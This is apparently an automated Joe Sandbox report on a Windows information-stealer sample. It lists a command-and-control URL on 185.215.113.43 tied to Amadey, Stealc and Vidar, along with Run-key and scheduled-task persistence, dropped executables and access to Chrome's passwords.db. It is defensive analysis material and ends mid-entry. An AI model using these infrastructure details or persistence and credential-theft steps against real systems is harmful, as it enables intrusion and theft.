00000008.00000003.3025779747.000001BCCC818000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3022845208.000001BCCC81D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.myip.com/	samat.exe, 00000008.00000002.4566260781.000001BCCDE80000.00000004.00001000.00020000.00000000.sdmp	false		high
http://ocsp.accv.es0	samat.exe, 00000008.00000003.4522465597.000001BCCD32F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523681717.000001BCCD337000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515697372.000001BCCD327000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.python.org/	samat.exe, 00000008.00000003.3023133248.000001BCCC89F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3025267001.000001BCCC88C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3023133248.000001BCCC835000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3024006784.000001BCCC88C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4503744422.000001BCCC8A7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3025997180.000001BCCC89B000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4505195812.000001BCCC8A9000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4525393736.000001BCCC8BC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp	false		high
https://tidelift.com/subscription/pkg/pypi-importlib-metadata?utm_source=pypi-importlib-metadata&utm	samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://docs.python.org/3/howto/mro.html.	samat.exe, 00000008.00000002.4556112760.000001BCCC200000.00000004.00001000.00020000.00000000.sdmp	false		high
https://twitter.com/	samat.exe, 00000008.00000003.4511515721.000001BCCCA6D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCA43000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4519148634.000001BCCCA6D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4524896627.000001BCCCA6D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4500760862.000001BCCCA6C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499341916.000001BCCCA43000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.quovadisglobal.com/cps	samat.exe, 00000008.00000003.4551443074.000001BCCCAC3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4547576732.000001BCCCAB1000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523371311.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4526519071.000001BCCCAAA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://google.com/mail/	samat.exe, 00000008.00000002.4559133719.000001BCCC7F1000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.43/Zu7JuNko/index.phpu	skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.43/Zu7JuNko/index.phps	skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://google.com/mail/	samat.exe, 00000008.00000003.4502629731.000001BCCC96C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527808216.000001BCCC98D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4514102538.000001BCCC983000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4513322534.000001BCCC97D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517233682.000001BCCC984000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.215.113.43	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
142.251.35.161	unknown	United States	15169	GOOGLEUS	false
23.44.203.17	unknown	United States	20940	AKAMAI-ASN1EU	false
23.57.90.111	unknown	United States	35994	AKAMAI-ASUS	false
152.195.19.97	unknown	United States	15133	EDGECASTUS	false
18.238.49.99	unknown	United States	16509	AMAZON-02US	false
104.126.116.98	unknown	United States	20940	AKAMAI-ASN1EU	false
162.159.61.3	chrome.cloudflare-dns.com	United States	13335	CLOUDFLARENETUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
20.110.205.119	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
13.91.222.61	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
104.126.116.83	unknown	United States	20940	AKAMAI-ASN1EU	false
104.126.116.81	unknown	United States	20940	AKAMAI-ASN1EU	false
94.245.104.56	ssl.bingadsedgeextension-prod-europe.azurewebsites.net	United Kingdom	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
172.67.75.163	api.myip.com	United States	13335	CLOUDFLARENETUS	false
142.250.181.100	www.google.com	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
188.165.52.14	thedotmediagroup.com	France	16276	OVHFR	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1560508
Start date and time:	2024-11-21 22:10:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 19m 19s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	59
Number of new started drivers analysed:	2
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@147/209@43/19
EGA Information:	Successful, ratio: 40%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Max analysis timeout: 600s exceeded, the analysis took too long
Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.95.31.18, 172.217.19.227, 64.233.165.84, 172.217.19.238, 23.218.208.109, 13.107.42.16, 204.79.197.203, 13.107.21.239, 204.79.197.239, 13.107.6.158, 40.126.53.10, 40.126.53.7, 20.190.181.1, 20.190.181.6, 20.190.181.5, 40.126.53.18, 40.126.53.6, 20.231.128.66, 172.165.69.228, 23.32.239.56, 23.32.239.18, 2.16.158.192, 2.16.158.186, 2.16.158.27, 2.16.158.40, 2.16.158.97, 2.16.158.33, 2.16.158.169, 2.16.158.187, 2.16.158.43, 13.87.96.169, 2.19.198.17, 23.32.239.58, 2.19.198.224, 104.126.37.195, 2.16.158.48, 2.16.158.72, 2.16.158.83, 2.16.158.74, 2.16.158.51, 2.16.158.75, 2.16.158.26, 2.16.158.91, 2.16.158.90, 2.16.158.170, 13.74.129.1, 204.79.197.237, 13.107.21.237, 142.250.80.67, 142.251.40.163, 142.251.41.3
Excluded domains from analysis (whitelisted): nav-edge.smartscreen.microsoft.com, slscr.update.microsoft.com, a416.dscd.akamai.net, data-edge.smartscreen.microsoft.com, img-s-msn-com.akamaized.net, clientservices.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, prod-agic-us-2.uksouth.cloudapp.azure.com, clients2.google.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, config-edge-skype.l-0007.l-msedge.net, login.live.com, e16604.g.akamaiedge.net, www.gstatic.com, l-0007.l-msedge.net, wu-b-net.trafficmanager.net, e28578.d.akamaiedge.net, www.bing.com, assets.msn.com.edgekey.net, fs.microsoft.com, bingadsedgeextension-prod.trafficmanager.net, c-bing-com.dual-a-0034.a-msedge.net, prod-atm-wds-edge.trafficmanager.net, www-www.bing.com.trafficmanager.net, business-bing-com.b-0005.b-msedge.net, a1834.dscg2.akamai.net, c.bing.com, clients.l.google.com, www.tm.lg.prod.aadmsa.trafficmanager.net, config.edge.skype.com.trafficmanager.net, c-msn-com-nsatc.trafficmanager.net, fs-wildcard.microsoft.com.edgekey.net.
Execution Graph export aborted for target file.exe, PID 4508 because it is empty
Execution Graph export aborted for target skotes.exe, PID 5476 because there are no executed function
Execution Graph export aborted for target skotes.exe, PID 6984 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
16:12:02	API Interceptor	28341644x Sleep call for process: skotes.exe modified
16:12:53	API Interceptor	4x Sleep call for process: svchost.exe modified
22:11:04	Task Scheduler	Run new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
22:18:49	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run svchost C:\Users\user\AppData\Local\svchost.exe
22:18:57	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run svchost C:\Users\user\AppData\Local\svchost.exe
22:19:05	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.43	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
23.57.90.111	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	563299efce875400a8d9b44b96597c8e-sample (1).zip	Get hash	malicious	Unknown	Browse
	https://abex.co.in/1/?clickid=crj4hrne79is73f9g3kg&lp_key=17263275da2fd8c1a244a24d3218001b69e7968282&t1=1083194587&t2=.us.05.desktop.nonadult.windows.edge&key=7dfcf14e88e3f6336162#	Get hash	malicious	Unknown	Browse
	https://acrobat.adobe.com/id/urn:aaid:sc:EU:98ca4a25-984a-4511-9eb1-b7e6c5c56a12	Get hash	malicious	HTMLPhisher	Browse
	https://microsoftedge.microsoft.com/addons/detail/rocketreach-edge-extensio/ldjlhlheoidifojmfkjfijmdhlagakni	Get hash	malicious	Unknown	Browse
	http://cf-ipfs.com	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Win32.TrojanX-gen.21247.5426.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse
	file.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse
152.195.19.97	http://ustteam.com/	Get hash	malicious	Unknown	Browse	www.ust.com/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.myip.com	file.exe	Get hash	malicious	Unknown	Browse	104.26.8.59
	file.exe	Get hash	malicious	LummaC, Ailurophile Stealer, Amadey, LummaC Stealer, Stealc	Browse	104.26.9.59
	file.exe	Get hash	malicious	Ailurophile Stealer	Browse	104.26.8.59
	installer.exe	Get hash	malicious	Unknown	Browse	172.67.75.163
	installer.exe	Get hash	malicious	Unknown	Browse	172.67.75.163
	installer.exe	Get hash	malicious	Unknown	Browse	172.67.75.163
	installer.exe	Get hash	malicious	Unknown	Browse	104.26.8.59
	ZoomInstaller.exe	Get hash	malicious	Unknown	Browse	104.26.9.59
	ZoomInstaller.exe	Get hash	malicious	Unknown	Browse	104.26.9.59
	file.exe	Get hash	malicious	LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer	Browse	104.26.9.59
chrome.cloudflare-dns.com	file.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	162.159.61.3
	1732215862df90b858ebf82740ce134fb5917becbb3385f4dfc36cbe28d6e90709df01f065739.dat-decoded.exe	Get hash	malicious	Unknown	Browse	162.159.61.3
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse	162.159.61.3
	S0FTWARE.exe	Get hash	malicious	Stealc, Vidar	Browse	162.159.61.3
	wE1inOhJA5.msi	Get hash	malicious	Remcos, RHADAMANTHYS	Browse	172.64.41.3
	test2.exe	Get hash	malicious	Unknown	Browse	162.159.61.3
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	172.64.41.3
	test2.exe	Get hash	malicious	Unknown	Browse	162.159.61.3
bg.microsoft.map.fastly.net	file.exe	Get hash	malicious	XWorm	Browse	199.232.210.172
	FW_ Signature Required For Agreement with ID_41392PJBM8759674.msg	Get hash	malicious	Unknown	Browse	199.232.210.172
	[EXTERNAL] Oakville shared ''o_akville_853473074_21.11.2024''.eml	Get hash	malicious	Unknown	Browse	199.232.210.172
	mORxR4LsiI.exe	Get hash	malicious	Unknown	Browse	199.232.210.172
	Kellyb Timesheet Report.pdf	Get hash	malicious	HTMLPhisher	Browse	199.232.214.172
	estimate Cost.pdf	Get hash	malicious	Unknown	Browse	199.232.214.172
	mLi58UzdI2.dll	Get hash	malicious	Unknown	Browse	199.232.210.172
	1.e.msi	Get hash	malicious	DanaBot	Browse	199.232.214.172
	F2.exe	Get hash	malicious	BlackMoon	Browse	199.232.214.172
	test2.exe	Get hash	malicious	Unknown	Browse	199.232.210.172

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AKAMAI-ASN1EU	file.exe	Get hash	malicious	Unknown	Browse	23.44.203.19
	FW_ Signature Required For Agreement with ID_41392PJBM8759674.msg	Get hash	malicious	Unknown	Browse	23.195.39.65
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	23.44.133.11
	[EXTERNAL] Oakville shared ''o_akville_853473074_21.11.2024''.eml	Get hash	malicious	Unknown	Browse	2.16.10.172
	1732215862df90b858ebf82740ce134fb5917becbb3385f4dfc36cbe28d6e90709df01f065739.dat-decoded.exe	Get hash	malicious	Unknown	Browse	23.55.235.251
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	104.70.121.26
	Quote Request.eml	Get hash	malicious	HTMLPhisher	Browse	184.28.198.131
	S0FTWARE.exe	Get hash	malicious	Stealc, Vidar	Browse	23.44.203.16
	phish_alert_sp2_2.0.0.0.eml	Get hash	malicious	HTMLPhisher	Browse	88.221.110.227
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	23.200.0.34
AKAMAI-ASUS	FW_ Signature Required For Agreement with ID_41392PJBM8759674.msg	Get hash	malicious	Unknown	Browse	92.122.16.141
	Quote Request.eml	Get hash	malicious	HTMLPhisher	Browse	2.19.126.151
	ExL4unch#U20ac#U00ae.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	qaHUaPUib8.exe	Get hash	malicious	Unknown	Browse	104.102.49.254
	qaHUaPUib8.exe	Get hash	malicious	Unknown	Browse	104.102.49.254
	ceFgl3jkkk.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	phish_alert_sp2_2.0.0.0.eml	Get hash	malicious	HTMLPhisher	Browse	184.28.90.27
	shell_php00.pdf	Get hash	malicious	Unknown	Browse	104.126.112.182
	96c27caf-3816-d26f-4af5-19e1d76e6c15.eml	Get hash	malicious	HTMLPhisher	Browse	2.19.126.160
	E89hSGjVrv.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	23.57.90.101
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
EDGECASTUS	https://app.smartsheet.com/b/form/9141bdd4d7da45789170a7064a677627	Get hash	malicious	HTMLPhisher	Browse	152.199.21.175
	file.exe	Get hash	malicious	Unknown	Browse	152.195.19.97
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	152.195.19.97
	http://clearview-ps.inwise.net/page_11-21-2024_1	Get hash	malicious	Unknown	Browse	152.199.21.175
	http://www.im-creator.com/viewer/vbid-2a496caa-iwgbu2zx/vbid-f9637b78-lok1anrm	Get hash	malicious	Unknown	Browse	152.199.21.175
	Status Update DXLG.html	Get hash	malicious	Unknown	Browse	152.199.21.175
	November Billing.html	Get hash	malicious	HTMLPhisher	Browse	152.199.21.175
	Quote Request.eml	Get hash	malicious	HTMLPhisher	Browse	152.199.21.175
	S0FTWARE.exe	Get hash	malicious	Stealc, Vidar	Browse	152.195.19.97
	https://1drv.ms/o/c/1ba8fd2bd98c98a8/EmMMbLWVyqxBh9Z6zxri2ZUBVkwUpSiY2KbvhupkdaFzGA?e=F6pNlD	Get hash	malicious	Unknown	Browse	152.199.21.175

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	file.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	20mktbose2.bat	Get hash	malicious	Abobus Obfuscator	Browse	149.154.167.220
	RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat	Get hash	malicious	AgentTesla, DBatLoader	Browse	149.154.167.220
	y.bat	Get hash	malicious	Braodo	Browse	149.154.167.220
	20bosemkt.bat	Get hash	malicious	Abobus Obfuscator	Browse	149.154.167.220
	OGo8AQxn4k.vbs	Get hash	malicious	Unknown	Browse	149.154.167.220
	3o2WdGwcLF.vbs	Get hash	malicious	Unknown	Browse	149.154.167.220
	https://amstoree.z13.web.core.windows.net/WinhelpSh0A057/index.html?Anph%5C=1-888-734-7204	Get hash	malicious	Unknown	Browse	149.154.167.220
	New PO 796512.exe	Get hash	malicious	FormBook	Browse	149.154.167.220
	Director of Performance Marketing Job Description Roles & Responsibilities Theory 2024.lnk	Get hash	malicious	Ducktail	Browse	149.154.167.220
37f463bf4616ecd445d4a1937da06e19	S0FTWARE.exe	Get hash	malicious	Stealc, Vidar	Browse	188.165.52.14
	order requirements CIF-TRC809945210.exe	Get hash	malicious	GuLoader	Browse	188.165.52.14
	qaHUaPUib8.exe	Get hash	malicious	Unknown	Browse	188.165.52.14
	qaHUaPUib8.exe	Get hash	malicious	Unknown	Browse	188.165.52.14
	Updated Invoice_0755404645-2024_pdf.exe	Get hash	malicious	Unknown	Browse	188.165.52.14
	CONTRACT COPY PRN00720387_pdf.exe	Get hash	malicious	GuLoader	Browse	188.165.52.14
	PO-841122676_g787.exe	Get hash	malicious	GuLoader	Browse	188.165.52.14
	Order requirements CIF Greece_pdf.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.165.52.14
	kXPgmYpAPg.doc	Get hash	malicious	Unknown	Browse	188.165.52.14
	ORDER 20240986 OA.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	188.165.52.14

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_ARC4.pyd	file.exe	Get hash	malicious	Unknown	Browse
	Payload.exe	Get hash	malicious	Python Stealer, BLX Stealer, XLABB Grabber	Browse
	Payload.exe	Get hash	malicious	Python Stealer, BLX Stealer, XLABB Grabber	Browse
	Creal.exe	Get hash	malicious	Creal Stealer	Browse
	#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe	Get hash	malicious	Blank Grabber, Creal Stealer	Browse
	https://t.ly/Oppenheim0511	Get hash	malicious	GO Backdoor	Browse
	RobCheat.exe	Get hash	malicious	Python Stealer, CStealer	Browse
	SecuriteInfo.com.Python.Stealer.1251.9496.6786.exe	Get hash	malicious	Python Stealer, BLX Stealer, XLABB Grabber	Browse
	SecuriteInfo.com.Python.Stealer.1251.9496.6786.exe	Get hash	malicious	Python Stealer, BLX Stealer, XLABB Grabber	Browse
	SecuriteInfo.com.Win64.Malware-gen.32485.11504.exe	Get hash	malicious	Python Stealer, Braodo	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0xa95d4887, page size 16384, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.6585136650545147
Encrypted:	false
SSDEEP:	1536:BSB2ESB2SSjlK/AxrO1T1B0CZSJWYkr3g16n2UPkLk+kdbI/0uznv0M1Dn/didMV:Baza6xhzA2U8HDnAPZ4PZf9h/9h
MD5:	2B4556C14FD96F60EACB406114BE86B8
SHA1:	F4570CE458128A956DAA9777CC8ACAACDFEDC511
SHA-256:	876C9FFF4000959DB695B917FEBA90714828A7D9163F0BF7BBDFA2CA68714F43
SHA-512:	D29449EA7D3DD14E8F45BB5BBBEA1088FE38A5DD715E0FD25F823988F26F39672E1B1E0CC75078528680C34CE7E9032B0A81E5C6E73F8A84A59E053C726DC49D
Malicious:	false
Preview:	.]H.... ...............X\...;...{......................T.~..........\|..5....\|=.h.\|..........\|..T.~.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{..................................%......\|.................AAO......\|...........................#......T.~.....................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Bunny\Info.txt

Download File

Process:	C:\Windows\System32\dxdiag.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	85407
Entropy (8bit):	5.206480742623876
Encrypted:	false
SSDEEP:	768:9P9JWMB5MBBEQ6Uc8FgGVoXX7lV6EMR57X3i0hG6gHCXkNEr+aL/FkJOlKwY0:97cIOV2uRoxHtOu0
MD5:	E81D34C9BFD90BC5F29E51DBAB39F7DA
SHA1:	A795213895AC5B6A5F90DFFB45AA8F7549665261
SHA-256:	5A0256ED38B20D969FB3EE53AB73E9CB8016A430D30199FB821B84E5C59C9E2B
SHA-512:	91325401F1D23F82FE6F9B680C6B6C9B7474F152231148EA9895B4FAC41B5E9D3BD9486032C8AFE5A90D70877A317B33E2B087F9886183016FCEB561AA8C0113
Malicious:	false
Preview:	------------------..System Information..------------------.. Time of this report: 11/21/2024, 16:12:42.. Machine name: 128757.. Machine Id: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}.. Operating System: Windows 10 Pro 64-bit (10.0, Build 19045) (19041.vb_release.191206-1406).. Language: English (Regional Setting: English).. System Manufacturer: 5Y4C4dmdgcpYDdU.. System Model: O2nYFOX7.. BIOS: VMW201.00V.20829224.B64.2211211842 (type: UEFI).. Processor: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (4 CPUs), ~2.0GHz.. Memory: 8192MB RAM.. Available OS Memory: 8192MB RAM.. Page File: 1723MB used, 6467MB available.. Windows Dir: C:\Windows.. DirectX Version: DirectX 12.. DX Setup Parameters: Not found.. User DPI Setting: 96 DPI (100 percent).. System DPI Setting: 96 DPI (100 percent).. DWM DPI Scaling: Disab

C:\Users\user\AppData\Local\D3DSCache\fe8d97be6d92aa78\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

Download File

Process:	C:\Windows\System32\dxdiag.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	65552
Entropy (8bit):	0.012588069182000032
Encrypted:	false
SSDEEP:	3:63qIllGlll/l/lXp9ZjrPBY06llcllXgvZP:63qIl0dPBY0O6/O
MD5:	7A0F107CC175B4CA3EDB21F3953CB3E9
SHA1:	7B64025EA33E429362475759AEB787CE8D3E101C
SHA-256:	27F484DE82D7E1A41A5DC67D0AE827C8407C07FFDF1DEF1D61BB114E825F74E0
SHA-512:	732FBF07C8C32F122E3DB2DEC40B727F9C1669F5103A741E56699C042530628755BDDC62E8F84B6321E2818F2080C17CF5FB0AE59C7701670491284C252C4BCB
Malicious:	false
Preview:	.j..........................................f...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\D3DSCache\fe8d97be6d92aa78\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

Download File

Process:	C:\Windows\System32\dxdiag.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:R:R
MD5:	F49655F856ACB8884CC0ACE29216F511
SHA1:	CB0F1F87EC0455EC349AAA950C600475AC7B7B6B
SHA-256:	7852FCE59C67DDF1D6B8B997EAA1ADFAC004A9F3A91C37295DE9223674011FBA
SHA-512:	599E93D25B174524495ED29653052B3590133096404873318F05FD68F4C9A5C9A3B30574551141FBB73D7329D6BE342699A17F3AE84554BAB784776DFDA2D5F8
Malicious:	false
Preview:	EERF

C:\Users\user\AppData\Local\D3DSCache\fe8d97be6d92aa78\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

Download File

Process:	C:\Windows\System32\dxdiag.exe
File Type:	Matlab v4 mat-file (little endian) (, numeric, rows 0, columns 16, imaginary
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.020482262885854904
Encrypted:	false
SSDEEP:	3:9llpl5d2DJqojBdl+Sli5lWyyHk15lRlTNlktt/llaia9sVQMm6En:c9q0Bn+SkSJkJNetb2Hrn
MD5:	27C5B2CF8CC33DE010AE37B1B8B0E715
SHA1:	F4B312BFCF51C533CA43AC8A5302450A906159AA
SHA-256:	2EB0A2FD1624CFD6E21CF4121E8C44071EEAAA94FC1B0B9A39B23B571D58D40F
SHA-512:	0ECF3D1E0FE3C336C5A12A01D0F960E605A3B1422ED1FE38C16BC959027890E91BC91C0DA70115ADDCFD4681112E8E20C6EAB68C2BF41F731CF97B05656B24DA
Malicious:	false
Preview:	................>...(....x:no.&A.e.u~+..C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.d.x.d.i.a.g...e.x.e.................................(...p.DJ!.IL.....Zm.F............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\passwords.db

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
